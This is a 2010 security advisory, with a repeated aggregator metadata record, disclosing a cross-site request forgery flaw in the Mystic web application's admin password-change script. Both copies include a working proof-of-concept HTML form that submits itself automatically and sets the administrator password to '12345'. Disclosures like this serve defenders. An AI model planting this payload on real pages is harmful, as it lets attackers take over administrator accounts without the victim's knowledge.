Vulnerability ID: HTB22533
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_mystic.html
Product: Mystic
Vendor: Hulihan Applications ( http://hulihanapplications.com/projects/mystic )
Vulnerable Version: 0.1.4 and Probably Prior Versions
Vendor Notification: 27 July 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the admin/change_password script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/change_password" method="post" name="main" >
<input type="hidden" name="user[password]" value="12345" />
<input type="hidden" name="user[password_confirmation]" value="12345" />
<input type="hidden" name="commit" value="Change Password" />
</form>
<script>
document.main.submit();
</script>
{"id": "SECURITYVULNS:DOC:24525", "bulletinFamily": "software", "title": "XSRF (CSRF) in Mystic", "description": "Vulnerability ID: HTB22533\r\nReference: http://www.htbridge.ch/advisory/xsrf_csrf_in_mystic.html\r\nProduct: Mystic\r\nVendor: Hulihan Applications ( http://hulihanapplications.com/projects/mystic ) \r\nVulnerable Version: 0.1.4 and Probably Prior Versions\r\nVendor Notification: 27 July 2010 \r\nVulnerability Type: CSRF (Cross-Site Request Forgery)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Low \r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the admin/change_password script to properly verify the source of HTTP request.\r\n\r\nSuccessful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n\r\nAttacker can use browser to exploit this vulnerability. The following PoC is available:\r\n\r\n<form action="http://host/admin/change_password" method="post" name="main" >\r\n<input type="hidden" name="user[password]" value="12345" />\r\n<input type="hidden" name="user[password_confirmation]" value="12345" />\r\n<input type="hidden" name="commit" value="Change Password" />\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n", "published": "2010-08-14T00:00:00", "modified": "2010-08-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24525", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:36", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 1.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11070"]}], "rev": 4}, "backreferences": {"references": [{"type": "htbridge", "idList": ["HTB22533"]}]}, "exploitation": null, "vulnersScore": 1.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645430276}}